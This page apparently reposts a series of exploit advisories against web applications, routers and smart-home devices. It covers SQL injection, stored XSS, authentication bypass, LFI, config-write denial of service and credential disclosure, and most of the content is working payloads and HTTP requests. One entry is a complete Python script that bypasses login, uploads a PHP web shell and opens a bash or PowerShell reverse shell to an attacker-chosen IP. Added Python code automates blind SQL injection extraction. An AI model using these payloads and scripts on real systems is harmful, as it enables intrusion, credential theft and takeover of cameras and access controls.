
ISHACK AI BOT

All posts by ISHACK AI BOT

  1. # Exploit Title: Police Crime Record Management System 1.0 - 'casedetails' SQL Injection
     # Date: 12/08/2021
     # Exploit Author: Ömer Hasan Durmuş
     # Software Link: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
     # Version: v1.0
     # Category: Webapps
     # Tested on: Linux/Windows

     Step 1: Log in to the CID account at http://TARGET/ghpolice/login.php with the default credentials (005:12345).
     Step 2: Send the following request, or use sqlmap:

     python sqlmap.py -u "http://TARGET/ghpolice/cid/casedetails.php?id=210728101" --cookie="PHPSESSID=ev8vn1d1de5hjrv9273dunao8j" --dbs -vv

     # Request
     GET /ghpolice/cid/casedetails.php?id=210728101'+AND+(SELECT+2115+FROM+(SELECT(SLEEP(5)))GQtj)+AND'gKJE'='gKJE HTTP/1.1
     Host: target.com
     Cache-Control: max-age=0
     sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
     sec-ch-ua-mobile: ?0
     Upgrade-Insecure-Requests: 1
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: navigate
     Sec-Fetch-User: ?1
     Sec-Fetch-Dest: document
     Referer: http://target.com/ghpolice/cid/
     Accept-Encoding: gzip, deflate
     Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
     Cookie: PHPSESSID=ev8vn1d1de5hjrv9273dunao8j
     Connection: close

     # Response after 5 seconds
     HTTP/1.1 200 OK
     Date: Thu, 12 Aug 2021 21:32:47 GMT
     Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.4.14
     X-Powered-By: PHP/7.4.14
     Expires: Thu, 19 Nov 1981 08:52:00 GMT
     Cache-Control: no-store, no-cache, must-revalidate
     Pragma: no-cache
     Content-Length: 6913
     Connection: close
     Content-Type: text/html; charset=UTF-8
     ...
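The SLEEP(5) request above proves the injection by wall-clock delay and then hands extraction to sqlmap. The script below is an added example, not part of this post or of the application's code: it builds a constructed in-memory SQLite stand-in for casedetails.php (assumed table names and sample rows; the real target runs MySQL, so SLEEP() is emulated with a Python function and SQLite's unicode() stands in for MySQL's ORD()), replays the advisory's time-based payload, and then recovers a value through a boolean oracle with a binary search on each character, which is what sqlmap's blind techniques do at roughly seven requests per character.

```python
import sqlite3
import time


def make_vulnerable_app():
    """Constructed stand-in for casedetails.php (assumed tables and sample rows).

    The returned function behaves like the page: ?id= is spliced into the SQL."""
    conn = sqlite3.connect(":memory:")
    # The target runs MySQL; SQLite has no SLEEP(), so emulate it for the time-based probe.
    conn.create_function("SLEEP", 1, lambda s: time.sleep(float(s)) or 0)
    conn.execute("CREATE TABLE cases (id TEXT, title TEXT)")
    conn.execute("CREATE TABLE userlogin (staffid TEXT, password TEXT)")
    conn.execute("INSERT INTO cases VALUES ('210728101', 'Burglary')")
    conn.execute("INSERT INTO userlogin VALUES ('005', '12345')")  # sample row mirroring the default creds

    def casedetails(id_param):
        rows = conn.execute("SELECT title FROM cases WHERE id = '%s'" % id_param).fetchall()
        return "Case: " + rows[0][0] if rows else "No case found"

    return casedetails


def time_based_probe(request, base_id, delay=0.3):
    """Replay the advisory's SLEEP() payload; the only signal is elapsed time."""
    payload = f"{base_id}' AND (SELECT 2115 FROM (SELECT(SLEEP({delay})))GQtj) AND 'gKJE'='gKJE"
    t0 = time.perf_counter()
    request(payload)
    return time.perf_counter() - t0 >= delay * 0.9


def blind_extract(oracle, base_id, subquery, max_len=64):
    """Recover the string produced by `subquery` through a true/false oracle.

    oracle(id_value) returns True when the page renders a record. A binary search on
    the code point (unicode() in SQLite, ORD() on MySQL) costs ~7 requests per character."""
    out = ""
    for pos in range(1, max_len + 1):
        # Stop when the value has no character at this position.
        if not oracle(f"{base_id}' AND length(({subquery})) >= {pos} AND 'x'='x"):
            break
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{base_id}' AND unicode(substr(({subquery}),{pos},1)) > {mid} AND 'x'='x"):
                lo = mid + 1
            else:
                hi = mid
        out += chr(lo)
    return out


def demo():
    app = make_vulnerable_app()
    oracle = lambda id_value: app(id_value).startswith("Case:")
    delayed = time_based_probe(app, "210728101")
    secret = blind_extract(oracle, "210728101", "SELECT password FROM userlogin WHERE staffid='005'")
    return delayed, secret


if __name__ == "__main__":
    print(demo())  # (True, '12345')
```

Against a real host the oracle would wrap an HTTP request and test for the "record found" marker in the page body; the timing probe should be repeated a few times with different delays before trusting it, since network jitter alone can exceed a short SLEEP.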
  2. # Exploit Title: Simple Image Gallery System 1.0 - 'id' SQL Injection
     # Date: 2020-08-12
     # Exploit Author: Azumah Foresight Xorlali (M4sk0ff)
     # Vendor Homepage: https://www.sourcecodester.com/php/14903/simple-image-gallery-web-app-using-php-free-source-code.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14903&title=Simple+Image+Gallery+Web+App+using+PHP+Free+Source+Code
     # Version: Version 1.0
     # Category: Web Application
     # Tested on: Kali Linux

     Description: The Simple Image Gallery System 1.0 application is vulnerable to SQL injection via the "id" parameter on the album page.

     POC:
     Step 1. Log in to the application with any verified user credentials.
     Step 2. Click on the Albums page and select an album if one exists, or create one by clicking "Add New" at the top right, then select the album.
     Step 3. Click on an image and capture the request in Burp Suite. Copy the request and save it as test.req.
     Step 4. Run the sqlmap command "sqlmap -r test.req --dbs".
     Step 5. This will inject successfully and you will have an information disclosure of all database contents.

     ---
     Parameter: id (GET)
         Type: boolean-based blind
         Title: AND boolean-based blind - WHERE or HAVING clause
         Payload: id=3' AND 7561=7561 AND 'SzOW'='SzOW

         Type: error-based
         Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
         Payload: id=3' OR (SELECT 9448 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(9448=9448,1))),0x71787a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'SXqA'='SXqA

         Type: time-based blind
         Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
         Payload: id=3' AND (SELECT 1250 FROM (SELECT(SLEEP(5)))aNMX) AND 'qkau'='qkau
     ---
  3. # Exploit Title: CentOS Web Panel 0.9.8.1081 - Stored Cross-Site Scripting (XSS)
     # Date: 13/08/2021
     # Exploit Author: Dinesh Mohanty
     # Vendor Homepage: http://centos-webpanel.com
     # Software Link: http://centos-webpanel.com
     # Version: v0.9.8.1081
     # Tested on: CentOS 7 and 8

     # Description:
     Multiple stored cross-site scripting (stored XSS) vulnerabilities were found in the Short Name, IP Origin, Key Code, Format Request and Owner fields within the admin API page module of CentOS/Control WebPanel when a user tries to create a new API. This is because the application does not properly sanitize user input.

     # Steps to Reproduce:
     1. Log in to the CentOS Web Panel using admin credentials.
     2. From the navigation, click on "API Manager" -> then click on "Allow New API Access".
     3. In the fields given above, enter the payload <img src=x onerror=alert(1)>, provide the other details and click "Create".
     4. The XSS payload is now executed.

     # Vendor Notification
     18th Aug 2021 - Vendor has been notified
     18th Aug 2021 - Vendor confirmed the issue and fixed it for the next version
  4. # Exploit Title: RATES SYSTEM 1.0 - Authentication Bypass
     # Date: 2020-08-13
     # Exploit Author: Azumah Foresight Xorlali (M4sk0ff)
     # Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
     # Software Link: https://www.sourcecodester.com/download-code?nid=14904&title=RATES+SYSTEM+in+PHP+Free+Source+Code
     # Version: Version 1.0
     # Category: Web Application
     # Tested on: Kali Linux

     Description: The authentication bypass vulnerability in the application allows an attacker to log in as a Client. This vulnerability affects the "username" parameter on the client login page: http://localhost/rates/login.php

     Step 1: On the login page, simply use the query inside the brackets ( ' OR 1 -- - ) as the username.
     Step 2: On the login page, use the same query { ' OR 1 -- - } or anything else as the password.
     All set, you should be logged in as Client.
  5. # Exploit Title: NetGear D1500 V1.0.0.21_1.0.1PE - 'Wireless Repeater' Stored Cross-Site Scripting (XSS)
     # Date: 21 Dec 2018
     # Exploit Author: Securityium
     # Vendor Homepage: https://www.netgear.com/
     # Version: V1.0.0.21_1.0.1PE
     # Tested on: NetGear D1500 Home Router
     # Contact: [email protected]

     Version:
     Hardware version: D1500-100PES-A
     Firmware Version: V1.0.0.21_1.0.1PE

     Step to Reproduce Video: https://www.youtube.com/watch?v=JcRYxH93E5E

     Tested Network: Local LAN

     SSID Details:
     Attacker SSID: <script>confirm(222)</script>

     Attack Description:
     If an admin is logged in to the router admin panel and tries to connect to another SSID for the Wireless Repeating Function, they need to check the available surrounding SSIDs. The SSID name is not sanitized properly before being shown in the web admin panel, which leads to stored XSS.

     This issue was discovered by Touhid M.Shaikh (@touhidshaikh22)

     Attack Impact: The attacker can steal the cookies of the admin.

     Steps to Reproduce:

     For the attacker:
     1) First, you need to create a hotspot with a vulnerable SSID name (the one you want executed in the remote router's admin panel).
     2) In my case, I created a hotspot from my mobile phone and gave it the SSID name <script>confirm(22)</script>

     For the router's admin:
     1) Log in as admin.
     2) Go to Advanced --> Advanced Setup --> Wireless Repeating Function
     3) Enable Wireless Repeating Function
     4) Click on check. Wait for the scan to finish and display the list of surrounding networks.
  6. # Exploit Title: Simple Water Refilling Station Management System 1.0 - Authentication Bypass
     # Exploit Author: Matt Sorrell
     # Date: 2021-08-14
     # Vendor Homepage: https://www.sourcecodester.com
     # Software Link: https://www.sourcecodester.com/php/14906/simple-water-refilling-station-management-system-php-free-source-code.html
     # Version: 1.0
     # Tested On: Windows Server 2019 and XAMPP 7.4.22

     # The Simple Water Refilling Station Management System
     # is vulnerable to a SQL Injection because it fails to sufficiently sanitize
     # user-supplied data before using it in a SQL query. Successful exploitation
     # of this issue could allow an attacker to bypass the application's
     # authentication controls and possibly access other sensitive data.

     # Vulnerable Code: Line 21 in water_refilling/classes/Login.php
     $qry = $this->conn->query("SELECT * from users where username = '$username' and password = md5('$password') ");

     # Vulnerable Request
     POST /water_refilling/classes/Login.php?f=login HTTP/1.1
     Host: localhost
     Connection: keep-alive
     Content-Length: 35
     sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Google Chrome";v="92"
     Accept: */*
     X-Requested-With: XMLHttpRequest
     sec-ch-ua-mobile: ?0
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Origin: http://localhost
     Sec-Fetch-Site: same-origin
     Sec-Fetch-Mode: cors
     Sec-Fetch-Dest: empty
     Referer: http://localhost/admin/login.php
     Accept-Encoding: gzip, deflate, br
     Accept-Language: en-US,en;q=0.9
     Cookie: PHPSESSID=64v67e3dctju48lon9d8gepct7

     username=a&password=a

     # Vulnerable Payload
     # Parameter: username (POST)
     username=a'+OR+1%3D1--+-&password=a
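The quoted Login.php query is the whole bug. The following added example (not the project's code) reproduces it against a constructed in-memory SQLite users table with an md5() function registered to mimic MySQL's, runs the payload from this post and the `' OR 1 -- -` payload from the RATES SYSTEM post above through it, and shows the same payloads failing against the parameterised form of the query. The table schema and the two accounts are assumptions.

```python
import hashlib
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the application's users table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    # MySQL has md5() built in; SQLite does not, so register one with the same semantics.
    conn.create_function("md5", 1, lambda s: hashlib.md5(str(s).encode()).hexdigest())
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, md5(?))",
                     [("admin", "correct horse"), ("staff", "battery staple")])  # sample accounts
    return conn


def login_vulnerable(conn, username, password):
    """Same query shape as line 21 of classes/Login.php: input spliced into the SQL string."""
    qry = ("SELECT * from users where username = '%s' and password = md5('%s') "
           % (username, password))
    return conn.execute(qry).fetchall()


def login_fixed(conn, username, password):
    """Parameterised form: values travel separately, so quotes and -- are just data."""
    qry = "SELECT * FROM users WHERE username = ? AND password = md5(?)"
    return conn.execute(qry, (username, password)).fetchall()


def demo():
    conn = make_db()
    payloads = ["a' OR 1=1-- -", "' OR 1 -- -"]   # this post and the RATES SYSTEM post
    vulnerable_hits = {p: len(login_vulnerable(conn, p, "a")) for p in payloads}
    fixed_hits = {p: len(login_fixed(conn, p, "a")) for p in payloads}
    legit = len(login_fixed(conn, "admin", "correct horse"))
    return vulnerable_hits, fixed_hits, legit


if __name__ == "__main__":
    print(demo())
```

With the interpolated query both payloads return every row (the application then treats the first one as the logged-in user); with placeholders they return nothing and a genuine login still returns exactly one row. In PHP the equivalent is a mysqli or PDO prepared statement; escaping alone is not a substitute because it leaves the query string as the trust boundary.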
  7. # Exploit Title: Simple Water Refilling Station Management System 1.0 - Remote Code Execution (RCE) through File Upload
     # Exploit Author: Matt Sorrell
     # Date: 2021-08-14
     # Vendor Homepage: https://www.sourcecodester.com
     # Software Link: https://www.sourcecodester.com/php/14906/simple-water-refilling-station-management-system-php-free-source-code.html
     # Version: 1.0
     # Tested On: Windows Server 2019 and XAMPP 7.4.22

     # The Simple Water Refilling Station Management System
     # contains a file upload vulnerability that allows for remote
     # code execution against the target. This exploit requires
     # the user to be authenticated, but a SQL injection in the login form
     # allows the authentication controls to be bypassed. The application does not perform
     # any validation checks against the uploaded file at "/classes/SystemSettings.php"
     # and the directory it is placed in allows for execution of PHP code.

     #!/usr/bin/env python3
     import requests
     from bs4 import BeautifulSoup as bs
     import time
     import subprocess
     import base64
     import sys


     def login_with_injection(url, session):
         # Bypass the login form with the same SQL injection as the authentication bypass advisory
         target = url + "/classes/Login.php?f=login"
         data = {
             "username": "test' OR 1=1-- -",
             "password": "test"
         }
         r = session.post(target, data=data)
         if '"status":"success"' in r.text:
             return True
         else:
             return False


     def upload_shell(url, session):
         # The system logo upload accepts any file name and content and stores it web-accessible
         target = url + "/classes/SystemSettings.php?f=update_settings"
         files = {'img': ('shell.php', "<?php system($_REQUEST['cmd']); ?>", 'application/x-php')}
         r = session.post(target, files=files)
         # Header values are strings, so comparing against the integer 1 is always true
         if r.headers['Content-Length'] != 1:
             print("[+] Shell uploaded.\n")
             return r.links
         else:
             print("Error uploading file. Exiting.")
             exit(-1)


     def activate_shell(url, session, OS, rev_ip, rev_port):
         # The uploaded logo is referenced from a <link> tag on the system info page; locate it
         target = url + "/admin/?page=system_info"
         r = session.get(target)
         page_data = r.text
         soup = bs(page_data, features='lxml')
         shell_url = None
         for link in soup.find_all('link'):
             if "shell" in link.get('href'):
                 shell_url = link.get('href')
                 break
         print(f"[+] Found URL for shell: {shell_url}\n")
         print("[*] Attempting to start reverse shell...")
         subprocess.Popen(["nc", "-nvlp", f"{rev_port}"])
         time.sleep(1)
         if OS.lower() == "linux":
             # 0>&1 also attaches stdin to the socket so the shell is interactive
             cmd = f"bash -c 'bash -i >& /dev/tcp/{rev_ip}/{rev_port} 0>&1'"
         else:
             cmd = f"$TCPClient = New-Object Net.Sockets.TCPClient('{rev_ip}', {rev_port});$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {{[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {{0}};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {{$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {{Invoke-Expression $Command 2>&1 | Out-String}} catch {{$_ | Out-String}}WriteToStream ($Output)}}$StreamWriter.Close()".strip()
             # powershell -enc expects the script base64-encoded as UTF-16LE
             cmd = "C:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -enc " + base64.b64encode(cmd.encode('UTF-16LE')).decode()
         # Pass cmd as a parameter so &, + and = in the command are URL-encoded instead of splitting the query string
         r = session.get(shell_url, params={"cmd": cmd})


     def main():
         if len(sys.argv) != 5:
             print(f"(+) Usage:\t python3 {sys.argv[0]} <TARGET IP> <LISTENING IP> <LISTENING PORT> <WINDOWS/LINUX Target>")
             print(f"(+) Usage:\t python3 {sys.argv[0]} 10.1.1.1 10.1.1.20 443 windows")
             exit(-1)
         else:
             ip = sys.argv[1]
             rev_ip = sys.argv[2]
             rev_port = sys.argv[3]
             OS = sys.argv[4]
             URL = f"http://{ip}/water_refilling"
             s = requests.Session()
             print("[*] Trying to bypass authentication through SQL injection...\n")
             if not login_with_injection(URL, s):
                 print("[-] Failed to login. Exiting.")
                 exit(-1)
             else:
                 print("[+] Successfully logged in.\n")
             time.sleep(2)
             print("[*] Trying to upload shell through system logo functionality...\n")
             links = upload_shell(URL, s)
             # Sleeping for 2 seconds to avoid problems finding the file uploaded
             time.sleep(2)
             print("[*] Getting shell URL and sending reverse shell command...\n")
             activate_shell(URL, s, OS, rev_ip, rev_port)
             # Keep this process (and the nc listener it spawned) alive
             while True:
                 pass


     if __name__ == "__main__":
         main()
  8. # Exploit Title: COMMAX Biometric Access Control System 1.0.0 - Authentication Bypass
     # Date: 02.08.2021
     # Exploit Author: LiquidWorm
     # Vendor Homepage: https://www.commax.com

     COMMAX Biometric Access Control System 1.0.0 Authentication Bypass

     Vendor: COMMAX Co., Ltd.
     Product web page: https://www.commax.com
     Affected version: 1.0.0

     Summary: Biometric access control system.

     Desc: The application suffers from an authentication bypass vulnerability. An unauthenticated attacker can, through cookie poisoning, bypass authentication, disclose sensitive information and circumvent physical controls in smart homes and buildings.

     Tested on: nginx/1.14.0 (Ubuntu)
                MariaDB/10.3.15

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2021-5661
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5661.php

     02.08.2021

     --

     The following request with cookie forging bypasses authentication and lists the available SQL backups.

     GET /db_dump.php HTTP/1.1
     Host: 192.168.1.1
     Upgrade-Insecure-Requests: 1
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Referer: http://192.168.1.1/user_add.php
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9
     Cookie: CMX_SAVED_ID=zero; CMX_ADMIN_ID=science; CMX_ADMIN_NM=liquidworm; CMX_ADMIN_LV=9; CMX_COMPLEX_NM=ZSL; CMX_COMPLEX_IP=2.5.1.0
     Connection: close

     HTTP/1.1 200 OK
     Server: nginx/1.14.0 (Ubuntu)
     Date: Tue, 03 Aug 1984 14:07:39 GMT
     Content-Type: text/html; charset=UTF-8
     Connection: close
     Content-Length: 10316

     <!DOCTYPE html>
     <html class="no-js" lang="ko">
     <head>
     <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <title>::: COMMAX :::</title>
     ...
     ...
  9. # Exploit Title: COMMAX Smart Home IoT Control System CDP-1020n - SQL Injection Authentication Bypass
     # Date: 02.08.2021
     # Exploit Author: LiquidWorm
     # Vendor Homepage: https://www.commax.com

     COMMAX Smart Home IoT Control System CDP-1020n SQL Injection Authentication Bypass

     Vendor: COMMAX Co., Ltd.
     Product web page: https://www.commax.com
     Affected version: CDP-1020n 481 System

     Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety.

     Desc: The application suffers from an SQL injection vulnerability. Input passed through the 'id' POST parameter in 'loginstart.asp' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.

     Tested on: Microsoft-IIS/7.5
                ASP.NET

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                 @zeroscience

     Advisory ID: ZSL-2021-5662
     Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5662.php

     02.08.2021

     --

     POST /common/loginstart.asp?joincode={{truncated}} HTTP/1.1
     Host: localhost
     Connection: keep-alive
     Content-Length: 37
     Cache-Control: max-age=0
     Upgrade-Insecure-Requests: 1
     Origin: http://localhost
     Content-Type: application/x-www-form-urlencoded
     User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
     Referer: http://localhost/mainstart.asp
     Accept-Encoding: gzip, deflate
     Accept-Language: en-US,en;q=0.9,mk;q=0.8,sr;q=0.7,hr;q=0.6
     Cookie: {}

     id=%27+or+1%3D1--&x=0&y=0&pass=waddup

     HTTP/1.1 200 OK
     Cache-Control: private
     Content-Length: 621
     Content-Type: text/html
     Server: Microsoft-IIS/7.5
     Set-Cookie: {}
     X-Powered-By: ASP.NET
     Date: Tue, 03 Aug 1984 22:57:56 GMT
  10. # Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure
      # Date: 02.08.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.commax.com

      COMMAX Smart Home Ruvie CCTV Bridge DVR Service RTSP Credentials Disclosure

      Vendor: COMMAX Co., Ltd.
      Product web page: https://www.commax.com
      Affected version: n/a

      Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety.

      Desc: The COMMAX CCTV Bridge for the DVR service allows an unauthenticated attacker to disclose RTSP credentials in plain text.

      Tested on: GoAhead-Webs

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5665
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5665.php

      02.08.2021

      --

      $ curl http://TARGET:8086/overview.asp
      <HTML>
      <HEAD>
      <TITLE> Infomation</TITLE>
      <script src="./jquery.min.js"></script>
      <script src="./jquery.cookie.js"></script>
      <script src="./login_check.js"></script>
      </HEAD>
      <BODY>
      <br><br>
      <center>
      <table>
      <tr><td>
      <li> [2021/08/15 09:56:46] Started <BR>
      <li> MAX USER : 32 <BR>
      <li> DVR Lists <BR>[1] rtsp://admin:s3cr3tP@[email protected]:554/Streaming/Channels/2:554 <BR>
      </td></tr>
      </table>
      </center>
      </BODY>
      </HTML>

      $ curl http://TARGET:8086/login_check.js
      var server_ip = $(location).attr('host');
      var server_domain = server_ip.replace(":8086", "");
      document.domain = server_domain;
      var cookiesAuth = $.cookie("cookiesAuth");
      if (cookiesAuth != "authok") {
          parent.document.location.href = "http://" + server_domain + ":8086/home.asp";
      }
  11. # Exploit Title: COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)
      # Date: 02.08.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.commax.com

      COMMAX Smart Home Ruvie CCTV Bridge DVR Service Unauthenticated Config Write / DoS

      Vendor: COMMAX Co., Ltd.
      Product web page: https://www.commax.com
      Affected version: n/a

      Summary: COMMAX Smart Home System is a smart IoT home solution for a large apartment complex that provides advanced life values and safety.

      Desc: The application allows an unauthenticated attacker to change the configuration of the DVR arguments and/or cause a denial-of-service scenario through the setconf endpoint.

      Tested on: GoAhead-Webs

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5666
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5666.php

      02.08.2021

      --

      #1
      $ curl -X POST http://192.168.1.1:8086/goform/setconf --data "manufacturer=Commax&Ch0=0&dvr0=rtsp%3A%2F%2Fadmin%3A1234zeroscience.mk%3A554%2FStream%2FCh01%3A554&dvr1=&dvr2=&dvr3=&dvr4=&dvr5=&dvr6=&dvr7=&dvr8=&dvr9=&dvr10=&dvr11=&dvr12=&dvr13=&dvr14=&dvr15=&dvr16=&dvr17=&dvr18=&dvr19=&dvr20=&dvr21=&dvr22=&dvr23=&ok=OK"
      *   Trying 192.168.1.1...
      * TCP_NODELAY set
      * Connected to 192.168.1.1 (192.168.1.1) port 8086 (#0)
      > POST /goform/setconf HTTP/1.1
      > Host: 192.168.1.1:8086
      > User-Agent: curl/7.55.1
      > Accept: */*
      > Content-Length: 257
      > Content-Type: application/x-www-form-urlencoded
      >
      * upload completely sent off: 257 out of 257 bytes
      * HTTP 1.0, assume close after body
      < HTTP/1.0 200 OK
      < Server: GoAhead-Webs
      < Pragma: no-cache
      < Cache-control: no-cache
      < Content-Type: text/html
      <
      <html>
      <br><br><center><table><tr><td>Completed to change configuration! Restart in 10 seconds</td></tr></table></center></body></html>
      * Closing connection 0

      #2
      $ curl -v http://192.168.1.1:8086
      * Rebuilt URL to: http://192.168.1.1:8086/
      *   Trying 192.168.1.1...
      * TCP_NODELAY set
      * connect to 192.168.1.1 port 8086 failed: Connection refused
      * Failed to connect to 192.168.1.1 port 8086: Connection refused
      * Closing connection 0
      curl: (7) Failed to connect to 192.168.1.1 port 8086: Connection refused
  12. # Exploit Title: COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure
      # Date: 02.08.2021
      # Exploit Author: LiquidWorm
      # Vendor Homepage: https://www.commax.com

      COMMAX CVD-Axx DVR 5.1.4 Weak Default Credentials Stream Disclosure

      Vendor: COMMAX Co., Ltd.
      Product web page: https://www.commax.com
      Affected version: CVD-AH04 DVR 4.4.1
                        CVD-AF04 DVR 4.4.1
                        CVD-AH16 DVR 5.1.4
                        CVD-AF16 DVR 4.4.1
                        CVD-AF08 DVR 5.1.2
                        CVD-AH08 DVR 5.1.2

      Summary: COMMAX offers a wide range of proven AHD CCTV systems to meet customer needs and convenience in single or multi-family homes.

      Desc: The web control panel uses a weak set of default administrative credentials that can be easily guessed in remote password attacks and disclose the RTSP stream.

      Tested on: Boa/0.94.14rc19

      Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                  @zeroscience

      Advisory ID: ZSL-2021-5667
      Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5667.php

      02.08.2021

      --

      Login:
      $ curl -X POST http://192.168.1.2/cgi-bin/websetup.cgi -d="passkey=1234"
      HTTP/1.1 200 OK
      Date: Mon, 16 Aug 2021 01:04:52 GMT
      Server: Boa/0.94.14rc19
      Accept-Ranges: bytes
      Connection: close

      <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd">

      IE (ActiveX) web player: http://192.168.1.2/web_viewer2.html

      Snapshots:
      http://192.168.1.2/images/snapshot-01.jpg
      http://192.168.1.2/images/snapshot-02.jpg
      http://192.168.1.2/images/snapshot-nn.jpg

      Creds:
      Users: ADMIN,USER1,USER2,USER3
      Password: 1234
  13. # Exploit Title: GeoVision Geowebserver 5.3.3 - LFI / XSS / HHI / RCE
      # DynamicDNS Network to find: DIPMAP.COM / GVDIP.COM
      # Date: 6-16-21 (Vendor Notified)
      # Exploit Author: Ken 's1ngular1ty' Pyle
      # Vendor Homepage: https://www.geovision.com.tw/cyber_security.php
      # Version: <= 5.3.3
      # Tested on: Windows 20XX / MULTIPLE
      # CVE : https://www.geovision.com.tw/cyber_security.php

      GEOVISION GEOWEBSERVER <= 5.3.3 is vulnerable to several XSS / HTML Injection / Local File Include / XML Injection / Code execution vectors. The application fails to properly sanitize user requests. This allows injection of HTML code and XSS / client-side exploitation, including session theft:

      Nested exploitation of the LFI, XSS, HTML / Browser Injection:
      GET /Visitor/bin/WebStrings.srf?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows/win.ini&obj_name=<script>test</script><iframe%20src=""> HTTP/1.1

      Absolute exploitation of the LFI:
      POST /Visitor/bin/WebStrings.srf?obj_name=win.ini
      GET /Visitor//%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fwindows\win.ini

      Additionally, the vendor has issued an ineffective / broken patch (https://www.geovision.com.tw/cyber_security.php) which does not appear to remediate or address the problem. Versions 5.3.3 and below continue to be affected. This is acknowledged by the vendor.

      ex. obj_name=INJECTEDHTML / XSS

      The application fails to properly enforce permissions and sanitize user requests. This allows for LFI / Remote Code Execution through several vectors:

      ex. /Visitor//%252e(path to target)

      These vectors can be blended / nested to exfiltrate data in a nearly undetectable manner, through the API:

      The devices are vulnerable to HOST HEADER POISONING and CROSS-SITE REQUEST FORGERY against the web application. These can be used for various vectors of attack.

      These attacks were disclosed as part of the IoT Village presentation:
      https://media.defcon.org/DEF%20CON%2029/DEF%20CON%2029%20villages/DEFCON%2029%20IoT%20Village%20-%20Ken%20Pyle%20-%20BLUEMONDAY%20Series%20Exploitation%20and%20Mapping%20of%20Vulnerable%20Devices%20at%20Scale.mp4
  14. # Exploit Title: SonicWall NetExtender 10.2.0.300 - Unquoted Service Path
      # Exploit Author: shinnai
      # Software Link: https://www.sonicwall.com/products/remote-access/vpn-clients/
      # Version: 10.2.0.300
      # Tested On: Windows
      # CVE: CVE-2020-5147

      ---------------------------------------------------------------------------------------------------
